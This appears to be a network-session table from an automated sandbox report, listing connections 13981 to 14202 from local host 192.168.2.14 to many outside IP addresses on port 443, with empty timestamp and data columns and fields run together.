                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13981192.168.2.145771089.254.35.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13982192.168.2.1451986111.56.198.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13983192.168.2.1456354187.41.157.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13984192.168.2.144270897.134.95.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13985192.168.2.1458278222.76.230.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13986192.168.2.145760464.134.204.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13987192.168.2.14541825.69.158.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13988192.168.2.144294654.207.24.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13989192.168.2.143454067.131.181.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13990192.168.2.1442184138.228.198.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13991192.168.2.1441306126.254.252.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13992192.168.2.1441010175.23.236.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13993192.168.2.14350264.85.144.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13994192.168.2.145739627.255.74.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13995192.168.2.1456068217.105.103.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13996192.168.2.1451760149.160.91.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13997192.168.2.14424362.20.198.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13998192.168.2.144672883.143.120.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13999192.168.2.1440826197.112.18.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14000192.168.2.144525883.44.108.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14001192.168.2.1438296112.51.26.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14002192.168.2.1458872200.108.105.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14003192.168.2.145408086.31.72.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14004192.168.2.143313466.240.186.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14005192.168.2.144601680.87.162.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14006192.168.2.1439880191.57.191.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14007192.168.2.1444038207.25.172.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14008192.168.2.1451204110.195.116.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14009192.168.2.14392241.40.179.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14010192.168.2.1441628103.87.115.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14011192.168.2.1452080197.101.7.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14012192.168.2.143572090.29.208.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14013192.168.2.145458838.52.10.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14014192.168.2.1458132165.53.160.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14015192.168.2.146070450.122.93.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14016192.168.2.1436240207.18.224.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14017192.168.2.143772235.138.183.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14018192.168.2.146011827.119.63.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14019192.168.2.1450778137.248.140.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14020192.168.2.1459086167.54.117.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14021192.168.2.145706449.206.0.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14022192.168.2.145469067.91.246.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14023192.168.2.1433456147.3.63.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14024192.168.2.1450896222.143.47.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14025192.168.2.145969445.146.67.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14026192.168.2.144648436.181.88.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14027192.168.2.143551225.147.203.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14028192.168.2.145462827.87.80.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14029192.168.2.146071032.184.50.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14030192.168.2.1451148155.143.81.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14031192.168.2.1434634176.194.30.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14032192.168.2.1454098221.187.87.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14033192.168.2.1455310145.149.169.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14034192.168.2.1460410192.231.109.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14035192.168.2.1444582183.229.64.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14036192.168.2.1448958138.65.119.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14037192.168.2.1460650144.11.216.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14038192.168.2.1441678110.70.117.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14039192.168.2.1456822150.93.3.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14040192.168.2.1454430220.184.213.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14041192.168.2.1436644192.33.10.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14042192.168.2.145530679.31.230.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14043192.168.2.1438374165.156.11.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14044192.168.2.1440688159.216.154.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14045192.168.2.144988491.5.255.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14046192.168.2.1456042170.223.149.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14047192.168.2.1455120129.137.63.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14048192.168.2.1449424143.78.202.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14049192.168.2.1452708166.44.186.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14050192.168.2.1439620162.68.95.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14051192.168.2.1447080100.30.101.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14052192.168.2.1449034112.97.113.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14053192.168.2.1437084143.13.19.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14054192.168.2.1440848139.211.159.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14055192.168.2.145869240.251.148.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14056192.168.2.1450788126.107.73.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14057192.168.2.144406453.25.201.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14058192.168.2.143472285.246.182.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14059192.168.2.1460214220.61.81.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14060192.168.2.1433482195.210.215.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14061192.168.2.145123239.126.197.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14062192.168.2.145114049.114.69.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14063192.168.2.1453362152.34.150.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14064192.168.2.1448162200.96.233.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14065192.168.2.1454842121.82.175.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14066192.168.2.144016234.193.149.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14067192.168.2.1459900197.229.225.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14068192.168.2.1452818122.125.23.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14069192.168.2.143773466.59.47.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14070192.168.2.145660417.185.142.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14071192.168.2.1444216198.184.77.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14072192.168.2.144482294.178.61.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14073192.168.2.1436122189.179.7.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14074192.168.2.1452254142.0.137.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14075192.168.2.144651077.225.227.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14076192.168.2.1434508107.180.70.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14077192.168.2.1460408163.185.7.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14078192.168.2.1451190175.143.90.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14079192.168.2.143621666.207.49.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14080192.168.2.1444244144.91.37.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14081192.168.2.1435960217.209.198.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14082192.168.2.1447108203.148.103.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14083192.168.2.143953635.225.175.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14084192.168.2.1441344146.214.97.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14085192.168.2.1435256166.140.45.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14086192.168.2.1448084168.49.211.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14087192.168.2.1459150145.55.193.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14088192.168.2.144630098.27.165.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14089192.168.2.143366677.88.158.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14090192.168.2.145470095.213.136.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14091192.168.2.144872059.65.250.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14092192.168.2.145369092.21.128.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14093192.168.2.145783240.23.205.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14094192.168.2.1436896210.74.29.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14095192.168.2.1453772139.172.159.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14096192.168.2.1440444142.137.102.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14097192.168.2.1450724170.197.10.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14098192.168.2.1439118106.86.241.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14099192.168.2.146013825.100.46.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14100192.168.2.1460092115.35.94.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14101192.168.2.144214854.99.117.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14102192.168.2.1436248191.71.91.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14103192.168.2.145039878.232.121.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14104192.168.2.1435988193.84.144.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14105192.168.2.1458172155.31.187.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14106192.168.2.1443920149.231.66.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14107192.168.2.1445194164.36.125.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14108192.168.2.1456652153.172.251.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14109192.168.2.1446158140.195.64.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14110192.168.2.1450840109.6.129.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14111192.168.2.1457240159.219.122.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14112192.168.2.1436474185.44.156.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14113192.168.2.1451940157.182.24.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14114192.168.2.1445576136.238.168.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14115192.168.2.1444598164.111.74.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14116192.168.2.145069675.140.35.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14117192.168.2.1449630189.162.173.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14118192.168.2.1460906182.39.122.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14119192.168.2.145525689.103.128.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14120192.168.2.1442324189.47.209.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14121192.168.2.14491481.138.93.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14122192.168.2.145823013.74.2.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14123192.168.2.1441448139.130.3.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14124192.168.2.1435482136.104.105.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14125192.168.2.1441444204.137.238.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14126192.168.2.1452310113.182.252.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14127192.168.2.14492525.182.11.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14128192.168.2.1457912159.35.74.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14129192.168.2.145738831.245.63.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14130192.168.2.1439926142.71.174.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14131192.168.2.1452036109.112.100.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14132192.168.2.1449094188.44.153.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14133192.168.2.143605214.75.118.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14134192.168.2.1440008139.116.137.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14135192.168.2.144849453.145.231.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14136192.168.2.1438214195.150.61.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14137192.168.2.1446010191.7.204.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14138192.168.2.1442096164.237.4.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14139192.168.2.1432862207.168.94.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14140192.168.2.144948861.168.10.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14141192.168.2.144579227.172.178.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14142192.168.2.1458768179.163.217.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14143192.168.2.1457746128.69.103.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14144192.168.2.144372074.152.29.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14145192.168.2.1455166204.115.220.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14146192.168.2.1458902162.167.217.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14147192.168.2.1451428169.173.40.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14148192.168.2.144692441.71.174.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14149192.168.2.143438666.60.149.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14150192.168.2.1458572187.5.65.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14151192.168.2.145764849.125.57.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14152192.168.2.1448150198.68.220.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14153192.168.2.1434406148.8.192.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14154192.168.2.1444354162.152.36.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14155192.168.2.1436684132.106.13.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14156192.168.2.14367649.103.121.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14157192.168.2.14381468.127.84.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14158192.168.2.1434136219.5.81.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14159192.168.2.14601822.6.119.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14160192.168.2.1450316170.188.234.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14161192.168.2.143662623.212.192.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14162192.168.2.1435182112.102.130.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14163192.168.2.1438050202.236.21.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14164192.168.2.1448552192.250.179.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14165192.168.2.1435806153.109.81.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14166192.168.2.143718059.141.227.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14167192.168.2.1445968100.147.86.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14168192.168.2.145689640.180.254.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14169192.168.2.1457470185.64.113.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14170192.168.2.1433422144.110.84.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14171192.168.2.1438932123.60.152.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14172192.168.2.1438888109.35.149.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14173192.168.2.1444642218.64.218.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14174192.168.2.144699875.239.13.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14175192.168.2.145049469.161.25.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14176192.168.2.143632486.220.78.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14177192.168.2.1454316167.116.13.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14178192.168.2.1456302106.241.31.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14179192.168.2.1442366179.83.242.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14180192.168.2.143815644.242.222.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14181192.168.2.144676213.20.119.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14182192.168.2.145700088.251.126.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14183192.168.2.143452231.200.198.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14184192.168.2.1451556146.173.59.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14185192.168.2.1451772203.101.221.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14186192.168.2.1460636126.63.81.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14187192.168.2.145465257.243.169.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14188192.168.2.1452998170.85.29.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14189192.168.2.1440212191.225.172.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14190192.168.2.144997638.167.88.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14191192.168.2.1446482171.168.158.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14192192.168.2.1449570106.131.20.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14193192.168.2.145329267.203.6.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14194192.168.2.1437750154.72.96.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14195192.168.2.144010849.161.190.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14196192.168.2.146074269.236.188.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14197192.168.2.1447384187.189.115.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14198192.168.2.143330076.248.53.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14199192.168.2.1456090205.40.251.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14200192.168.2.1440974119.19.148.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14201192.168.2.1448288167.244.226.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14202192.168.2.144217887.215.147.68443
